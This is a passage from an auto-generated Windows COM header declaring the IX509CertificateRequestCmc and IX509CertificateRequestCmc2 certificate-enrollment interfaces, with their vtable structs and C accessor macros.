            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHash )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificates )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue);
        
        END_INTERFACE
    } IX509CertificateRequestCmcVtbl;

    interface IX509CertificateRequestCmc
    {
        CONST_VTBL struct IX509CertificateRequestCmcVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCmc_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCmc_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCmc_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCmc_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCmc_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCmc_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCmc_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCmc_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCmc_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCmc_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCmc_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCmc_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCmc_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCmc_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCmc_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCmc_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCmc_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCmc_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCmc_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCmc_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCmc_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCmc_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCmc_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCmc_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCmc_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCmc_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCmc_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestCmc_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCmc_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestCmc_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestCmc_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCmc_InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName) ) 

#define IX509CertificateRequestCmc_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCmc_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_TransactionId(This,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,pValue) ) 

#define IX509CertificateRequestCmc_put_TransactionId(This,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Value) ) 

#define IX509CertificateRequestCmc_get_SenderNonce(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SenderNonce(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_SenderNonce(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SenderNonce(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_ArchivePrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ArchivePrivateKey(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ArchivePrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_ArchivePrivateKey(This,Value) ) 

#define IX509CertificateRequestCmc_get_KeyArchivalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_KeyArchivalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_KeyArchivalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyArchivalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestCmc_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestCmc_get_EncryptedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHash(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_get_SignerCertificates(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificates(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCmc_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCmc2_INTERFACE_DEFINED__
#define __IX509CertificateRequestCmc2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCmc2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCmc2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35d-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCmc2 : public IX509CertificateRequestCmc
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromInnerRequestTemplate( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( 
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes = AllowedKeySignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckCertificateSignature( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCertificate,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCmc2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCmc2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplateName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHash )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificates )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *CheckCertificateSignature )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
